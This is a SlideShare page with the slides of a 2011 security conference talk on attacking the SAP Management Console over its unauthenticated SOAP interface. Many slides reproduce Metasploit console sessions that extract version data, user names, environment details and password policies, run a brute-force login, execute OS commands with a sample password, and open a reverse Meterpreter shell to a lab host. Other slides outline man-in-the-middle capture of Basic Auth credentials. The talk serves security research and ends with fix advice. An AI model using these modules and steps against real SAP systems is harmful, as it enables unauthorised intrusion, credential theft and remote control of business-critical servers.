SlideShare une entreprise Scribd logo

SAP (in)security: Scrubbing SAP clean with SOAP

Chris John Riley
Chris John Riley

Hashdays Conference (29th Oct. 2011) SAP (in)security: Scrubbing SAP clean with SOAP ---------- Abstract: ---------- At the heart of any large enterprise, lies a platform misunderstood and feared by all but the bravest systems administrators. Home to a wealth of information, and key to infinite wisdom. This platform is SAP. For years this system has been amongst the many "red pen" items on penetration tests and audits alike... but no more! We will no longer accept the cries of "Business critical, out-of-scope". The time for SAP has come, the cross-hairs of attackers are firmly focused on the soft underbelly that is ERM, and it's our duty to follow suit. Join me as we take the first steps into exploring SAP, extracting information and popping shells. Leave your Nessus license at the door! It's time to scrub this SAP system clean with SOAP! ----------

Technologie
1  sur  100
SAP (in)security Scrubbing SAP clean with SOAP Chris John Riley
“THE WISEST MAN, IS HE WHO KNOWS, THAT HE KNOWS NOTHING” SOCRATES: APOLOGY, 21D
NOT AN EXPERT!
1) What's what 2) Information is king 3) Getting in the middle 4) Putting it all together 5) Stopping Bob!
WHAT’S WHAT
“…the world's leading provider of business software, SAP (which stands for "Systems, Applications, and Products in Data Processing") delivers products and services that help accelerate business innovation for our customers.”
Other people describe them as… “…the world's leading repository of business critical information, SAP (which stands for ”Security Ain't [our] Problem") delivers products and services that helpattackers gain access to critical enterprise data.”
Some rights reserved by TrevinC
IS IT REALLY THAT BAD?
Some rights reserved by Telstar Logistics
Some rights reserved by Telstar Logistics
So Many Reasons  Vulnerabilties are a part of it!  Every system has it‘s vulnerabilities  SAP installations often fall to business  Not an operations problem  Financial data should be handled by the business  Security team never gets close to it!
“YOU CAN'T TEST THAT, IT'S BUSINESS CRITICAL!” UNKNOWN PROJECT MANAGER
Some rights reserved by Telstar Logistics
SIMPLE OBJECT ACCESS PROTOCOL
You’re getting SOAP all over my SAP! THIS TALK SAP Security Netweaver . SOAP
A LITTLE BIT ABOUT SAP MANAGEMENT CONSOLE
SAP MC Communications  Default port 5<instance>13/14  50013 HTTP  50014 HTTPS  Can use SSL  If it‘s configured  More on this later!
SAP MC Communications  Uses Basic authfor some functions  Yes... It‘s 2011  Yes... Companies still use Basic Auth  Most functions don‘t even use that!
ENABLED BY DEFAULT…
ON ALL SAP SYSTEMS!
SAP MC MMC Snap-in
SAP MC JAVA Applet
INFORMATION IS KING
“If there's one thing SAP MC loves, it's giving away information“ Quote by: Me, just now!
Show me the money!
Information is king  Version information  Sure, HTTP headers give that!  Nothing new here... mostly  Down to the patch-level  Can you say “targeted attack“
Version Information msfauxiliary(sap_mgmt_con_version) > show options Module options (auxiliary/scanner/sap/sap_mgmt_con_version): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOSTS 172.16.15.128 yes The target address range RPORT 50013 yes The target port THREADS 1 yes The number of threads URI / no Path to the SAP MC VHOST no HTTP server virtual host
Version Information msfauxiliary(sap_mgmt_con_version) > show options Module options (auxiliary/scanner/sap/sap_mgmt_con_version): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOSTS 172.16.15.128 yes The target address range RPORT 50013 yes The target port THREADS 1 yes The number of threads URI / no Path to the SAP MC VHOST no HTTP server virtual host
Version Information msfauxiliary(sap_mgmt_con_version) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Version Number Extracted - 172.16.15.128:50013 [+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel [+] [SAP] SID: NSP [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Version Information msfauxiliary(sap_mgmt_con_version) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Version Number Extracted - 172.16.15.128:50013 [+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel [+] [SAP] SID: NSP [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Information is king  Startup profile  Instance name  SAP System Name  SAP SID  SAP DB Schema  Paths  ....
Startup Profile msfauxiliary(sap_mgmt_con_startprofile) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Startup Profile Extracted: WINXPSAP- TSTsapmntNSPSYSprofileSTART_DVEBMGS00_WINXPSAP -TST [*] SAPSYSTEMNAME = NSP [*] SAPGLOBALHOST = WINXPSAP-TST [*] SAPSYSTEM = 00 [*] INSTANCE_NAME = DVEBMGS00 [*] DIR_PROFILE = WINXPSAP-TSTsapmntNSPSYSprofile [*] _PF = $(DIR_PROFILE)NSP_DVEBMGS00_WINXPSAP-TST [*] dbs/ada/schema = SAPNSP
Startup Profile msfauxiliary(sap_mgmt_con_startprofile) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Startup Profile Extracted: WINXPSAP- TSTsapmntNSPSYSprofileSTART_DVEBMGS00_WINXPSAP -TST [*] SAPSYSTEMNAME = NSP [*] SAPGLOBALHOST = WINXPSAP-TST [*] SAPSYSTEM = 00 [*] INSTANCE_NAME =DVEBMGS00 [*] DIR_PROFILE = WINXPSAP-TSTsapmntNSPSYSprofile [*] _PF = $(DIR_PROFILE)NSP_DVEBMGS00_WINXPSAP-TST [*] dbs/ada/schema = SAPNSP
Information is king  Server / Instance Environment  Computername  Database Names  Database Type (Oracle, MaxDB, ...)  Full Server Environment Variable list!  Information overload  OMG why!
Environment msfauxiliary(sap_mgmt_con_getenv) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [*] COMPUTERNAME=WINXPSAP-TST [*] ComSpec=C:WINDOWSsystem32cmd.exe [*] DBMS_TYPE=ada [*] FP_NO_HOST_CHECK=NO [*] OS=Windows_NT [*] USERNAME=SAPServiceNSP [*] PSModulePath=C:windowssystem32PowerShell... [*] SAPEXE=E:usrsapNSPSYSexeucNTI386 [*] TMP=E:usrsapNSPtmp
Environment msfauxiliary(sap_mgmt_con_getenv) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [*] COMPUTERNAME=WINXPSAP-TST [*] ComSpec=C:WINDOWSsystem32cmd.exe [*] DBMS_TYPE=ada [*] FP_NO_HOST_CHECK=NO [*] OS=Windows_NT [*] USERNAME=SAPServiceNSP [*] PSModulePath=C:windowssystem32PowerShell... [*] SAPEXE=E:usrsapNSPSYSexeucNTI386 [*] TMP=E:usrsapNSPtmp
Information is king  SAP Log/Tracefiles  SAP Startup Logs  Error / Debug Logs  Developer Traces  Security Logs  SAP ABAPSysLog  SAP Startup Times  PIDs  Services + Status Info
Log/Trace Files msfauxiliary(sap_mgmt_con_listlogfiles) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface Filename Size Timestamp -------- ---- --------- available.log 2268 2011 10 16 12:52:33 dev_cp 4397 2011 04 19 10:30:48 dev_disp 4612 2011 10 14 15:06:14 dev_icm 6594 2011 10 14 15:07:38 sapstart.log 629 2011 10 14 15:06:04 sapstartsrv.log 754 2011 10 16 10:04:36 stderr1 903 2011 10 14 15:06:04
Log/Trace Files <SAPControl:ReadDeveloperTraceResponse> <name>E:usrsapNSPDVEBMGS00workdev_w0<name> <item>trc file: "dev_w0", trc level: 1, release: "720"</item> <item>---------------------------------------------------</item> <item>* ACTIVE TRACE LEVEL 1</item> <item>M pid 3564</item> <item>M DpSysAdmExtCreate: ABAP is active</item> <item>M DpShMCreate: allocated sys_adm at 09A40048</item> <item>M DpShMCreate: allocated wp_adm at 09A43020</item> <item>M DpShMCreate:allocated tm_adm at 09A47E48</item> …
ABAP Log File <SAPControl:ABAPReadSyslogResponse><log> <item><Time>2011 10 14 15:06:18</Time> <Text>SAP: ICM started on host WINXPSAP-TST (PID: 3536) </Text><Severity>SAPControl-GREEN</Severity> <item><Time>2011 10 14 15:06:12</Time> <Text>SAP Basis: Active ICU Version 3.4; Compiled With ICU 3.4; Unicode Version 4.1 </Text><Severity>SAPControl-GREEN</Severity></item> …
Information is king  Extracting data from logfiles  Logfiles include usernames  Scrape for usernames  Instant brute-force user list!  #wimming!  Just an example of the data availble
Extract Users [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Users Extracted: 10 entries extracted [+] [SAP] Extracted User: SAPSYS [+] [SAP] Extracted User: TEST1 [+] [SAP] Extracted User: TESTDEV [+] [SAP] Extracted User: ADMIN1 [+] [SAP] Extracted User: SAPADM [+] [SAP] Extracted User: TEST2 …
Extract Users [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Users Extracted: 10 entries extracted [+] [SAP] Extracted User: SAPSYS [+] [SAP] Extracted User: TEST1 [+] [SAP] Extracted User: TESTDEV [+] [SAP] Extracted User: ADMIN1 [+] [SAP] Extracted User: SAPADM [+] [SAP] Extracted User: TEST2 …
Information is king  Process Parameters  Output of the entire SAP configuration  Password Policies  Setup your Brute-force just right ;)  Hash Types  Still supporting those old 8 char hashes?  Security Audit Log Enabled ?  rsau/enabled (default: 0)  Is anybody watching?
Process Parameters msfauxiliary(sap_mgmt_con_getprocessparameter) > run [*] [SAP] Connecting to SAP MC on 172.16.15.128:50013 [*] [SAP] Attempting to matche (?i-mx:^login/password) [SAP] Process Parameters Name Value ------ ---------- login/password_charset 1 login/password_downwards_compatibility 1 login/password_hash_algorithm encoding=RFC2307, algorithm=iSSHA-1, saltsize=96 login/password_max_idle_productive 0
Process Parameters msfauxiliary(sap_mgmt_con_getprocessparameter) > run [*] [SAP] Connecting to SAP MC on 172.16.15.128:50013 [*] [SAP] Attempting to matche (?i-mx:^login/password) [SAP] Process Parameters Name Value ------ ---------- login/password_charset 1 login/password_downwards_compatibility 1 login/password_hash_algorithm encoding=RFC2307, algorithm=iSSHA-1, saltsize=96 login/password_max_idle_productive 0
Process Parameters <SAPControl:GetProcessParameterResponse><parameter> <item><name>DIR_AUDIT</name> <group>System</group> <description>Directory for security audit files</description> <unit/><value>E:usrsapNSPDVEBMGS00log</value></item> <item><name>login/fails_to_user_lock</name> <group>Login</group> <description>Number of invalid login attempts until user lock</description> <unit/><value>5 </value></item> …
Process Parameters <SAPControl:GetProcessParameterResponse><parameter> <item><name>DIR_AUDIT</name> <group>System</group> <description>Directory for security audit files</description> <unit/><value>E:usrsapNSPDVEBMGS00log</value></item> <item><name>login/fails_to_user_lock</name> <group>Login</group> <description>Number of invalid login attempts until user lock</description> <unit/><value>5 </value></item> …
Information is king  Useful Process Parameters  rsau/enabled  login/password_downward_compatibility  login/failed_user_auto_unlock  login/fails_to_user_lock  login/min_password_lng  login/password_charset  .... *Checkout consolut.com for a great list
“I put a whitebox configuration audit in your blackbox penetration test, so you can whitebox SAP while you blackbox it!“ Quote by: Me, just now!
Information overload  All unauthenticated  But you have to be IN the network right!  Right?
Bueller
Bueller
Bueller
2,700 Number of SAP servers 2,675 listening on public addresses 2,650 2,625 2,600 2,575 2,550 2,525 2,500 Router Gateway SAP MC SAP MC (SSL)
Some rights reserved by Crystl
GETTING IN THE MIDDLE
Basic auth is your friend!
SAP MC authentication
MAN IN THE MIDDLE…
LET ME COUNT THE WAYS…
Getting in the middle  Force Authentication  Basic Auth == Clear Text  Credentials FTW!  Alter Requests  Do what YOU want  Alter Responses
SAP MC authentication
SAP MC authentication
Getting in the middle  4 different options for SSL protection  Self Signed  Device Default (not an option for SAP)  Enterprise CA  You sign your own certs centrally  Externally signed  Diginotar to the rescue!  SAP also offer signing services
Getting in the middle  Impersonate SSL  There‘s a module for that ;)  Creates a fake cert  As close to the original as possible  Useful SE options  Expired yesterday  Add CN names for ease of use
PUTTING IT ALL TOGETHER
OSExecute  SAP MC generously offers OSExecute function  Valid username/password req.  That‘s handy!
USERNAME / PASSWORD?
MITM  Using the force-auth method  Check under the keyboard  Post-it notes!  Rubber hose method
Brute-Force  Metasploit module  Set SAP SID for SAP specific checks  Watchout for lockouts!  Denial of Service?
Brute Force msfauxiliary(sap_mgmt_con_brute_login) > set SAP_SID NSP msfauxiliary(sap_mgmt_con_brute_login) > run [*]SAPSID set to 'NSP' - Setting default SAP wordlist [*] Trying username:'sapservicensp' password:'' [-] [01/18] - failed to login as 'sapservicensp' password: '' [*] Trying username:'sapservicensp' password:'sapserviceNSP’ [-] [02/18] - failed to login as 'sapadm' password: '' [*] Trying username:'nspadm' password:'' …
OSExecute auxiliary(sap_..._osexec) > set RHOSTS 172.16.15.128 auxiliary(sap_..._osexec) > set USERNAME sapservicensp auxiliary(sap_..._osexec) > set PASSWORD Pr0d@dm1n auxiliary(sap_..._osexec) > set CMD hostname auxiliary(sap_..._osexec) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Command run as PID: 1240 Command output -------------- WINXPSAP-TST
THANKS, BUT WE WANT METERPETER!
Getting Meterpreter  Using tricks built into Metasploit  Encode Payload  Split it up into chucks  Shove it in  Start it up!  Profit
OSExecuteMeterpreter msfexploit(sap_mgmt_con_osexec_exploit) > exploit [*] Started reverse handler on 172.16.15.134:4444 [*] Command Stager - 7.42% done (7499/101079 bytes) ... [*] Command Stager - 100.00% done (101079/101079 bytes) [*] Meterpretersession 1 opened(172.16.15.134:4444 -> 172.16.15.128:1144) at 2011-10-16 14:41:59 +0200 meterpreter>getuid Server username: WINXPSAP-TSTSAPServiceNSP
STOPPING BOB!
WHY IS YOUR SAP MC ACCESSIBLE TO THE WORLD!
SLIGHTLY LESS HTTPS== BAD
Fixing the issues  SAP Fix  SAP Note 1439348  Issue also discovered by Onapsis  No idea what it says!  SAP restrict ALL fix info to customers only
Next Steps  More Research  Finish the MITM module  Force Auth works now  JAVA Applet deployment not so much  Look at SAP SSL implementation  SSL is a punching bag right now  Sleep
Questions ? http://c22.cc contact@c22.cc
Big Thanks  The REAL SAP Security Researchers  Onapsis  DSecRG  Raul Siles  CYBSEC  SAP PSRT  DirtySec (You know who you are!)  MacLemon for the PPT-fu  All the people who helped make this happen
Thanks for coming http://c22.cc contact@c22.cc
Sorry for sucking so bad! http://c22.cc contact@c22.cc

Recommandé

SecZone 2011: Scrubbing SAP clean with SOAP
SecZone 2011: Scrubbing SAP clean with SOAPSecZone 2011: Scrubbing SAP clean with SOAP
SecZone 2011: Scrubbing SAP clean with SOAPChris John Riley
 
Essential Linux Commands for DBAs
Essential Linux Commands for DBAsEssential Linux Commands for DBAs
Essential Linux Commands for DBAsGokhan Atil
 
How lve stats2 works for you and your customers
How lve stats2 works for you and your customersHow lve stats2 works for you and your customers
How lve stats2 works for you and your customersCloudLinux
 
Linux Desktop Automation
Linux Desktop AutomationLinux Desktop Automation
Linux Desktop AutomationRui Lapa
 
Mysql tracing
Mysql tracingMysql tracing
Mysql tracingAnis Berejeb
 
Tested install-isp config3-ubuntu-16-04
Tested install-isp config3-ubuntu-16-04Tested install-isp config3-ubuntu-16-04
Tested install-isp config3-ubuntu-16-04SANTIAGO HERNÁNDEZ
 
SharePoint 2010 Virtualization - Norway SharePoint User Group
SharePoint 2010 Virtualization - Norway SharePoint User GroupSharePoint 2010 Virtualization - Norway SharePoint User Group
SharePoint 2010 Virtualization - Norway SharePoint User GroupMichael Noel
 
SharePoint 2010 Virtualization - SharePoint Saturday L.A.
SharePoint 2010 Virtualization - SharePoint Saturday L.A.SharePoint 2010 Virtualization - SharePoint Saturday L.A.
SharePoint 2010 Virtualization - SharePoint Saturday L.A.Michael Noel
 

Recommandé

SecZone 2011: Scrubbing SAP clean with SOAP
SecZone 2011: Scrubbing SAP clean with SOAPSecZone 2011: Scrubbing SAP clean with SOAP
SecZone 2011: Scrubbing SAP clean with SOAPChris John Riley
 
Essential Linux Commands for DBAs
Essential Linux Commands for DBAsEssential Linux Commands for DBAs
Essential Linux Commands for DBAsGokhan Atil
 
How lve stats2 works for you and your customers
How lve stats2 works for you and your customersHow lve stats2 works for you and your customers
How lve stats2 works for you and your customersCloudLinux
 
Linux Desktop Automation
Linux Desktop AutomationLinux Desktop Automation
Linux Desktop AutomationRui Lapa
 
Mysql tracing
Mysql tracingMysql tracing
Mysql tracingAnis Berejeb
 
Tested install-isp config3-ubuntu-16-04
Tested install-isp config3-ubuntu-16-04Tested install-isp config3-ubuntu-16-04
Tested install-isp config3-ubuntu-16-04SANTIAGO HERNÁNDEZ
 
SharePoint 2010 Virtualization - Norway SharePoint User Group
SharePoint 2010 Virtualization - Norway SharePoint User GroupSharePoint 2010 Virtualization - Norway SharePoint User Group
SharePoint 2010 Virtualization - Norway SharePoint User GroupMichael Noel
 
SharePoint 2010 Virtualization - SharePoint Saturday L.A.
SharePoint 2010 Virtualization - SharePoint Saturday L.A.SharePoint 2010 Virtualization - SharePoint Saturday L.A.
SharePoint 2010 Virtualization - SharePoint Saturday L.A.Michael Noel
 
Instalar PENTAHO 5 en CentOS 6
Instalar PENTAHO 5 en CentOS 6Instalar PENTAHO 5 en CentOS 6
Instalar PENTAHO 5 en CentOS 6Moisés Elías Araya
 
在Oel5上安装配置oracle gird control 10.2.0.5
在Oel5上安装配置oracle gird control 10.2.0.5在Oel5上安装配置oracle gird control 10.2.0.5
在Oel5上安装配置oracle gird control 10.2.0.5maclean liu
 
UKOUG 2011: Practical MySQL Tuning
UKOUG 2011: Practical MySQL TuningUKOUG 2011: Practical MySQL Tuning
UKOUG 2011: Practical MySQL TuningFromDual GmbH
 
Basic MySQL Troubleshooting for Oracle DBAs
Basic MySQL Troubleshooting for Oracle DBAsBasic MySQL Troubleshooting for Oracle DBAs
Basic MySQL Troubleshooting for Oracle DBAsSveta Smirnova
 
Dating Pro Installation Instructions
Dating Pro Installation InstructionsDating Pro Installation Instructions
Dating Pro Installation InstructionsPilot Group Ltd
 
Transparent firewall filtering bridge - pf sense 2.0.2 by william tarrh
Transparent firewall filtering bridge - pf sense 2.0.2 by william tarrhTransparent firewall filtering bridge - pf sense 2.0.2 by william tarrh
Transparent firewall filtering bridge - pf sense 2.0.2 by william tarrhHichem Chehida
 
Supercharging your PHP pages with mod_lsapi in CloudLinux OS
Supercharging your PHP pages with mod_lsapi in CloudLinux OSSupercharging your PHP pages with mod_lsapi in CloudLinux OS
Supercharging your PHP pages with mod_lsapi in CloudLinux OSCloudLinux
 
MySQL Troubleshooting with the Performance Schema
MySQL Troubleshooting with the Performance SchemaMySQL Troubleshooting with the Performance Schema
MySQL Troubleshooting with the Performance SchemaSveta Smirnova
 
L.A.M.P Installation Note --- CentOS 6.5
L.A.M.P Installation Note --- CentOS 6.5L.A.M.P Installation Note --- CentOS 6.5
L.A.M.P Installation Note --- CentOS 6.5William Lee
 
Performance Schema for MySQL Troubleshooting
Performance Schema for MySQL TroubleshootingPerformance Schema for MySQL Troubleshooting
Performance Schema for MySQL TroubleshootingSveta Smirnova
 
Backup and restore router configuration
Backup and restore router configurationBackup and restore router configuration
Backup and restore router configurationVasilis Nikitaras
 
Centos config
Centos configCentos config
Centos configMuhammad Abdi
 
J Ruby On Rails Presentation
J Ruby On Rails PresentationJ Ruby On Rails Presentation
J Ruby On Rails Presentationrailsconf
 
Introducing new SQL syntax and improving performance with preparse Query Rewr...
Introducing new SQL syntax and improving performance with preparse Query Rewr...Introducing new SQL syntax and improving performance with preparse Query Rewr...
Introducing new SQL syntax and improving performance with preparse Query Rewr...Sveta Smirnova
 
Multiple instances second method
Multiple instances second methodMultiple instances second method
Multiple instances second methodVasudeva Rao
 
Lamp Server With Drupal Installation
Lamp Server With Drupal InstallationLamp Server With Drupal Installation
Lamp Server With Drupal Installationfranbow
 
tuningfor_oracle
tuningfor_oracle tuningfor_oracle
tuningfor_oraclestyxyx
 
Oracle on Solaris
Oracle on SolarisOracle on Solaris
Oracle on SolarisTelkom Institute of Management
 
Document Management: Opendocman and LAMP installation on Cent OS
Document Management: Opendocman and LAMP installation on Cent OSDocument Management: Opendocman and LAMP installation on Cent OS
Document Management: Opendocman and LAMP installation on Cent OSSiddharth Ram Dinesh
 
Basic MySQL Troubleshooting for Oracle Database Administrators
Basic MySQL Troubleshooting for Oracle Database AdministratorsBasic MySQL Troubleshooting for Oracle Database Administrators
Basic MySQL Troubleshooting for Oracle Database AdministratorsSveta Smirnova
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 
sap basis transaction codes
sap basis transaction codessap basis transaction codes
sap basis transaction codesEOH SAP Services
 

Contenu connexe

Tendances

在Oel5上安装配置oracle gird control 10.2.0.5
在Oel5上安装配置oracle gird control 10.2.0.5在Oel5上安装配置oracle gird control 10.2.0.5
在Oel5上安装配置oracle gird control 10.2.0.5maclean liu
 
UKOUG 2011: Practical MySQL Tuning
UKOUG 2011: Practical MySQL TuningUKOUG 2011: Practical MySQL Tuning
UKOUG 2011: Practical MySQL TuningFromDual GmbH
 
Basic MySQL Troubleshooting for Oracle DBAs
Basic MySQL Troubleshooting for Oracle DBAsBasic MySQL Troubleshooting for Oracle DBAs
Basic MySQL Troubleshooting for Oracle DBAsSveta Smirnova
 
Dating Pro Installation Instructions
Dating Pro Installation InstructionsDating Pro Installation Instructions
Dating Pro Installation InstructionsPilot Group Ltd
 
Transparent firewall filtering bridge - pf sense 2.0.2 by william tarrh
Transparent firewall filtering bridge - pf sense 2.0.2 by william tarrhTransparent firewall filtering bridge - pf sense 2.0.2 by william tarrh
Transparent firewall filtering bridge - pf sense 2.0.2 by william tarrhHichem Chehida
 
Supercharging your PHP pages with mod_lsapi in CloudLinux OS
Supercharging your PHP pages with mod_lsapi in CloudLinux OSSupercharging your PHP pages with mod_lsapi in CloudLinux OS
Supercharging your PHP pages with mod_lsapi in CloudLinux OSCloudLinux
 
MySQL Troubleshooting with the Performance Schema
MySQL Troubleshooting with the Performance SchemaMySQL Troubleshooting with the Performance Schema
MySQL Troubleshooting with the Performance SchemaSveta Smirnova
 
L.A.M.P Installation Note --- CentOS 6.5
L.A.M.P Installation Note --- CentOS 6.5L.A.M.P Installation Note --- CentOS 6.5
L.A.M.P Installation Note --- CentOS 6.5William Lee
 
Performance Schema for MySQL Troubleshooting
Performance Schema for MySQL TroubleshootingPerformance Schema for MySQL Troubleshooting
Performance Schema for MySQL TroubleshootingSveta Smirnova
 
Backup and restore router configuration
Backup and restore router configurationBackup and restore router configuration
Backup and restore router configurationVasilis Nikitaras
 
J Ruby On Rails Presentation
J Ruby On Rails PresentationJ Ruby On Rails Presentation
J Ruby On Rails Presentationrailsconf
 
Introducing new SQL syntax and improving performance with preparse Query Rewr...
Introducing new SQL syntax and improving performance with preparse Query Rewr...Introducing new SQL syntax and improving performance with preparse Query Rewr...
Introducing new SQL syntax and improving performance with preparse Query Rewr...Sveta Smirnova
 
Multiple instances second method
Multiple instances second methodMultiple instances second method
Multiple instances second methodVasudeva Rao
 
Lamp Server With Drupal Installation
Lamp Server With Drupal InstallationLamp Server With Drupal Installation
Lamp Server With Drupal Installationfranbow
 
tuningfor_oracle
tuningfor_oracle tuningfor_oracle
tuningfor_oraclestyxyx
 
Document Management: Opendocman and LAMP installation on Cent OS
Document Management: Opendocman and LAMP installation on Cent OSDocument Management: Opendocman and LAMP installation on Cent OS
Document Management: Opendocman and LAMP installation on Cent OSSiddharth Ram Dinesh
 
Basic MySQL Troubleshooting for Oracle Database Administrators
Basic MySQL Troubleshooting for Oracle Database AdministratorsBasic MySQL Troubleshooting for Oracle Database Administrators
Basic MySQL Troubleshooting for Oracle Database AdministratorsSveta Smirnova
 

Tendances (20)

Instalar PENTAHO 5 en CentOS 6
Instalar PENTAHO 5 en CentOS 6Instalar PENTAHO 5 en CentOS 6
Instalar PENTAHO 5 en CentOS 6
 
在Oel5上安装配置oracle gird control 10.2.0.5
在Oel5上安装配置oracle gird control 10.2.0.5在Oel5上安装配置oracle gird control 10.2.0.5
在Oel5上安装配置oracle gird control 10.2.0.5
 
UKOUG 2011: Practical MySQL Tuning
UKOUG 2011: Practical MySQL TuningUKOUG 2011: Practical MySQL Tuning
UKOUG 2011: Practical MySQL Tuning
 
Basic MySQL Troubleshooting for Oracle DBAs
Basic MySQL Troubleshooting for Oracle DBAsBasic MySQL Troubleshooting for Oracle DBAs
Basic MySQL Troubleshooting for Oracle DBAs
 
Dating Pro Installation Instructions
Dating Pro Installation InstructionsDating Pro Installation Instructions
Dating Pro Installation Instructions
 
Transparent firewall filtering bridge - pf sense 2.0.2 by william tarrh
Transparent firewall filtering bridge - pf sense 2.0.2 by william tarrhTransparent firewall filtering bridge - pf sense 2.0.2 by william tarrh
Transparent firewall filtering bridge - pf sense 2.0.2 by william tarrh
 
Supercharging your PHP pages with mod_lsapi in CloudLinux OS
Supercharging your PHP pages with mod_lsapi in CloudLinux OSSupercharging your PHP pages with mod_lsapi in CloudLinux OS
Supercharging your PHP pages with mod_lsapi in CloudLinux OS
 
MySQL Troubleshooting with the Performance Schema
MySQL Troubleshooting with the Performance SchemaMySQL Troubleshooting with the Performance Schema
MySQL Troubleshooting with the Performance Schema
 
L.A.M.P Installation Note --- CentOS 6.5
L.A.M.P Installation Note --- CentOS 6.5L.A.M.P Installation Note --- CentOS 6.5
L.A.M.P Installation Note --- CentOS 6.5
 
Performance Schema for MySQL Troubleshooting
Performance Schema for MySQL TroubleshootingPerformance Schema for MySQL Troubleshooting
Performance Schema for MySQL Troubleshooting
 
Backup and restore router configuration
Backup and restore router configurationBackup and restore router configuration
Backup and restore router configuration
 
Centos config
Centos configCentos config
Centos config
 
J Ruby On Rails Presentation
J Ruby On Rails PresentationJ Ruby On Rails Presentation
J Ruby On Rails Presentation
 
Introducing new SQL syntax and improving performance with preparse Query Rewr...
Introducing new SQL syntax and improving performance with preparse Query Rewr...Introducing new SQL syntax and improving performance with preparse Query Rewr...
Introducing new SQL syntax and improving performance with preparse Query Rewr...
 
Multiple instances second method
Multiple instances second methodMultiple instances second method
Multiple instances second method
 
Lamp Server With Drupal Installation
Lamp Server With Drupal InstallationLamp Server With Drupal Installation
Lamp Server With Drupal Installation
 
tuningfor_oracle
tuningfor_oracle tuningfor_oracle
tuningfor_oracle
 
Oracle on Solaris
Oracle on SolarisOracle on Solaris
Oracle on Solaris
 
Document Management: Opendocman and LAMP installation on Cent OS
Document Management: Opendocman and LAMP installation on Cent OSDocument Management: Opendocman and LAMP installation on Cent OS
Document Management: Opendocman and LAMP installation on Cent OS
 
Basic MySQL Troubleshooting for Oracle Database Administrators
Basic MySQL Troubleshooting for Oracle Database AdministratorsBasic MySQL Troubleshooting for Oracle Database Administrators
Basic MySQL Troubleshooting for Oracle Database Administrators
 

Similaire à SAP (in)security: Scrubbing SAP clean with SOAP

Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 
sap basis transaction codes
sap basis transaction codessap basis transaction codes
sap basis transaction codesEOH SAP Services
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalabilityWim Godden
 
SharePoint 2010 Virtualization - SharePoint Saturday East Bay 2010
SharePoint 2010 Virtualization - SharePoint Saturday East Bay 2010SharePoint 2010 Virtualization - SharePoint Saturday East Bay 2010
SharePoint 2010 Virtualization - SharePoint Saturday East Bay 2010Michael Noel
 
SharePoint 2010 Virtualisation - SharePoint Saturday UK
SharePoint 2010 Virtualisation - SharePoint Saturday UKSharePoint 2010 Virtualisation - SharePoint Saturday UK
SharePoint 2010 Virtualisation - SharePoint Saturday UKMichael Noel
 
Instrumenting plugins for Performance Schema
Instrumenting plugins for Performance SchemaInstrumenting plugins for Performance Schema
Instrumenting plugins for Performance SchemaMark Leith
 
점진적인 레거시 웹 애플리케이션 개선 과정
점진적인 레거시 웹 애플리케이션 개선 과정점진적인 레거시 웹 애플리케이션 개선 과정
점진적인 레거시 웹 애플리케이션 개선 과정Arawn Park
 
SharePoint 2010 Virtualization
SharePoint 2010 VirtualizationSharePoint 2010 Virtualization
SharePoint 2010 VirtualizationMichael Noel
 
Prog1 chap1 and chap 2
Prog1 chap1 and chap 2Prog1 chap1 and chap 2
Prog1 chap1 and chap 2rowensCap
 
OSMC 2008 | Monitoring MySQL by Geert Vanderkelen
OSMC 2008 | Monitoring MySQL by Geert VanderkelenOSMC 2008 | Monitoring MySQL by Geert Vanderkelen
OSMC 2008 | Monitoring MySQL by Geert VanderkelenNETWAYS
 
php & performance
php & performance php & performance
php & performancesimon8410
 
BeeGFS Training.pdf
BeeGFS Training.pdfBeeGFS Training.pdf
BeeGFS Training.pdfssusercbaa33
 
Presentation iv implementasi 802x eap tls peap mscha pv2
Presentation iv implementasi 802x eap tls peap mscha pv2Presentation iv implementasi 802x eap tls peap mscha pv2
Presentation iv implementasi 802x eap tls peap mscha pv2Hell19
 
Sap basis administrator user guide
Sap basis administrator user guideSap basis administrator user guide
Sap basis administrator user guidePoguttuezhiniVP
 
SharePoint 2010's Virtual Reality - SPC2C
SharePoint 2010's Virtual Reality - SPC2CSharePoint 2010's Virtual Reality - SPC2C
SharePoint 2010's Virtual Reality - SPC2CMichael Noel
 
PeopleSoft Integration broker Performance Tunning
PeopleSoft Integration broker Performance TunningPeopleSoft Integration broker Performance Tunning
PeopleSoft Integration broker Performance TunningInSync Conference
 
Atmosphere Conference 2015: Taming the Modern Datacenter
Atmosphere Conference 2015: Taming the Modern DatacenterAtmosphere Conference 2015: Taming the Modern Datacenter
Atmosphere Conference 2015: Taming the Modern DatacenterPROIDEA
 
SharePoint 2010 Virtualization - Hungarian SharePoint User Group
SharePoint 2010 Virtualization - Hungarian SharePoint User GroupSharePoint 2010 Virtualization - Hungarian SharePoint User Group
SharePoint 2010 Virtualization - Hungarian SharePoint User GroupMichael Noel
 

Similaire à SAP (in)security: Scrubbing SAP clean with SOAP (20)

